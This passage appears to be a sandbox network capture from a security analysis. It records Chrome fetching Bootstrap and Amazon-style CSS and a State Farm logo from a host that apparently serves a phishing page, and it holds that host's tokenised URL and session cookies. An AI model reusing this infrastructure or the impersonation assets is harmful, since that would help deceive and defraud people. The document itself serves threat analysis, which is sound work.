                                                          2023-11-27 03:23:49 UTC1369INData Raw: 0d 0a 0d 0a 2e 61 2d 62 75 74 74 6f 6e 2d 64 69 73 2d 70 72 69 6d 61 72 79 20 7b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 42 30 30 30 30 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 38 61 38 61 38 20 23 39 63 39 63 39 63 20 23 38 34 38 34 38 34 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 0d 0a 7d 0d 0a 0d 0a 0d 0a 2e 61 2d 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 2e 61 2d 62 75 74 74 6f 6e 2d 69 6e 6e 65 72 20 7b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 33 64 30 37 38 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 63 66 32 37 32 37 2c 23 63 66 32 37 32 37 29 3b 20 2f 2a 20 68 73 6c 61
                                                          Data Ascii: .a-button-dis-primary { background: #B00000; border-color: #a8a8a8 #9c9c9c #848484; color: #fff}.a-button-primary .a-button-inner { background: #f3d078; background: -webkit-linear-gradient(top,#cf2727,#cf2727); /* hsla
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 0d 0a 2e 61 2d 62 75 74 74 6f 6e 2d 73 74 61 63 6b 20 2e 61 2d 62 75 74 74 6f 6e 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 7d 0d 0a 0d 0a 2e 61 2d 62 75 74 74 6f 6e 2d 73 74 61 63 6b 20 2e 61 2d 62 75 74 74 6f 6e 3a 6c 61 73 74 2d 63 68 69 6c 64 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 0d 0a 7d 0d 0a 0d 0a 0d 0a 2e 61 2d 69 63 6f 6e 20 7b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 63 61 72 74 34 2e 70 6e 67 29 3b 0d 0a 20 20 20 20 23 20 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 38 30 30 70 78 20 31 33 34
                                                          Data Ascii: .a-button-stack .a-button { margin-bottom: 10px; display: block}.a-button-stack .a-button:last-child { margin-bottom: 0}.a-icon { background-image: url(assets/images/cart4.png); # -webkit-background-size: 800px 134
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 6f 6c 6f 72 3a 20 23 62 31 62 30 62 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 09 7d 0d 0a 0d 0a 09 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 20 2f 2a 20 46 69 72 65 66 6f 78 20 31 38 2d 20 2a 2f 0d 0a 09 09 63 6f 6c 6f 72 3a 20 23 62 31 62 30 62 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 20 0d 0a 09 7d 0d 0a 0d 0a 09 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 20 20 2f 2a 20 46 69 72 65 66 6f 78 20 31 39 2b 20 2a 2f 0d 0a 09 09 63 6f 6c 6f 72 3a 20 23 62 31 62 30 62 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 20 0d 0a 09
                                                          Data Ascii: olor: #b1b0b0 !important;text-align: center;}:-moz-placeholder { /* Firefox 18- */color: #b1b0b0 !important;text-align: center; }::-moz-placeholder { /* Firefox 19+ */color: #b1b0b0 !important;text-align: center;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.549727104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:49 UTC3700OUTGET /assets/bootstrap/dist/css/bootstrap.min.css HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: text/css,*/*;q=0.1
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: style
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:49 UTC714INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 63 73 73 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 30 34 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 31 64 39 61 63 2d 36 30 38 39 30 32 65 34 35 66 62 66 35 2d 67 7a 69 70 22 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:49 GMTContent-Type: text/cssTransfer-Encoding: chunkedConnection: closeLast-Modified: Wed, 25 Oct 2023 20:20:04 GMTETag: W/"1d9ac-608902e45fbf5-gzip"Vary: Accept-EncodingCache-Control: max-age=14
                                                          2023-11-27 03:23:49 UTC655INData Raw: 37 63 65 34 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 36 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 35 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 33 2e 30 2e 33 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b
                                                          Data Ascii: 7ce4/*! * Bootstrap v3.3.6 (http://getbootstrap.com) * Copyright 2011-2015 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 65 3a 30 7d 61 62 62 72 5b 74 69 74 6c 65 5d 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 64 6f 74 74 65 64 7d 62 2c 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 64 66 6e 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 7d 68 31 7b 6d 61 72 67 69 6e 3a 2e 36 37 65 6d 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 6d 61 72 6b 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 30 7d 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 30 25 7d 73 75 62 2c 73 75 70 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 37 35 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 70 7b 74
                                                          Data Ascii: e:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{t
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 2e 33 35 65 6d 20 2e 36 32 35 65 6d 20 2e 37 35 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 32 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 73 69 6c 76 65 72 7d 6c 65 67 65 6e 64 7b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 7d 74 65 78 74 61 72 65 61 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 6f 70 74 67 72 6f 75 70 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 74 61 62 6c 65 7b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 7d 74 64 2c 74 68 7b 70 61 64 64 69 6e 67 3a 30 7d 2f 2a 21 20 53 6f 75 72 63 65 3a 20 68 74 74 70 73 3a 2f 2f
                                                          Data Ascii: -webkit-appearance:none}fieldset{padding:.35em .625em .75em;margin:0 2px;border:1px solid silver}legend{padding:0;border:0}textarea{overflow:auto}optgroup{font-weight:700}table{border-spacing:0;border-collapse:collapse}td,th{padding:0}/*! Source: https://
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 74 74 66 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 73 76 67 23 67 6c 79 70 68 69 63 6f 6e 73 5f 68 61 6c 66 6c 69 6e 67 73 72 65 67 75 6c 61 72 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 7d
                                                          Data Ascii: lings-regular.woff2) format('woff2'),url(../fonts/glyphicons-halflings-regular.woff) format('woff'),url(../fonts/glyphicons-halflings-regular.ttf) format('truetype'),url(../fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular) format('svg')}
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 6e 74 3a 22 5c 65 30 31 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6f 66 66 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 69 67 6e 61 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 6f 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 72 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 32 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 68 6f 6d 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 32 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 69 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 32 32 22 7d 2e 67 6c 79 70 68 69 63 6f
                                                          Data Ascii: nt:"\e016"}.glyphicon-off:before{content:"\e017"}.glyphicon-signal:before{content:"\e018"}.glyphicon-cog:before{content:"\e019"}.glyphicon-trash:before{content:"\e020"}.glyphicon-home:before{content:"\e021"}.glyphicon-file:before{content:"\e022"}.glyphico
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 6c 79 70 68 69 63 6f 6e 2d 74 65 78 74 2d 68 65 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 35 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 65 78 74 2d 77 69 64 74 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 35 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 61 6c 69 67 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 35 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 35 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 61 6c 69 67 6e 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 35 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 61 6c 69 67 6e 2d 6a 75 73 74 69 66 79 3a 62 65 66
                                                          Data Ascii: lyphicon-text-height:before{content:"\e050"}.glyphicon-text-width:before{content:"\e051"}.glyphicon-align-left:before{content:"\e052"}.glyphicon-align-center:before{content:"\e053"}.glyphicon-align-right:before{content:"\e054"}.glyphicon-align-justify:bef
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 6d 6f 76 65 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6f 6b 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 71 75 65 73 74 69 6f 6e 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 69 6e 66 6f 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 63 72 65 65 6e 73 68 6f 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 37 22 7d 2e
                                                          Data Ascii: -sign:before{content:"\e082"}.glyphicon-remove-sign:before{content:"\e083"}.glyphicon-ok-sign:before{content:"\e084"}.glyphicon-question-sign:before{content:"\e085"}.glyphicon-info-sign:before{content:"\e086"}.glyphicon-screenshot:before{content:"\e087"}.
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 2d 63 61 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6f 6c 64 65 72 2d 63 6c 6f 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6f 6c 64 65 72 2d 6f 70 65 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 73 69 7a 65 2d 76 65 72 74 69 63 61 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 73 69 7a 65 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 32 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 68 64 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22
                                                          Data Ascii: -cart:before{content:"\e116"}.glyphicon-folder-close:before{content:"\e117"}.glyphicon-folder-open:before{content:"\e118"}.glyphicon-resize-vertical:before{content:"\e119"}.glyphicon-resize-horizontal:before{content:"\e120"}.glyphicon-hdd:before{content:"
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 67 6c 79 70 68 69 63 6f 6e 2d 75 73 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 67 62 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 6f 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 35 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 6f 72 74 2d 62 79 2d 61 6c 70 68 61 62 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 35 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 6f 72 74 2d 62 79 2d 61 6c 70 68 61 62 65 74 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 35 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 6f 72 74 2d 62 79 2d 6f 72 64 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e
                                                          Data Ascii: glyphicon-usd:before{content:"\e148"}.glyphicon-gbp:before{content:"\e149"}.glyphicon-sort:before{content:"\e150"}.glyphicon-sort-by-alphabet:before{content:"\e151"}.glyphicon-sort-by-alphabet-alt:before{content:"\e152"}.glyphicon-sort-by-order:before{con


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.549728104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:49 UTC3736OUTGET /assets/images/State-Farm-Logo.png HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaF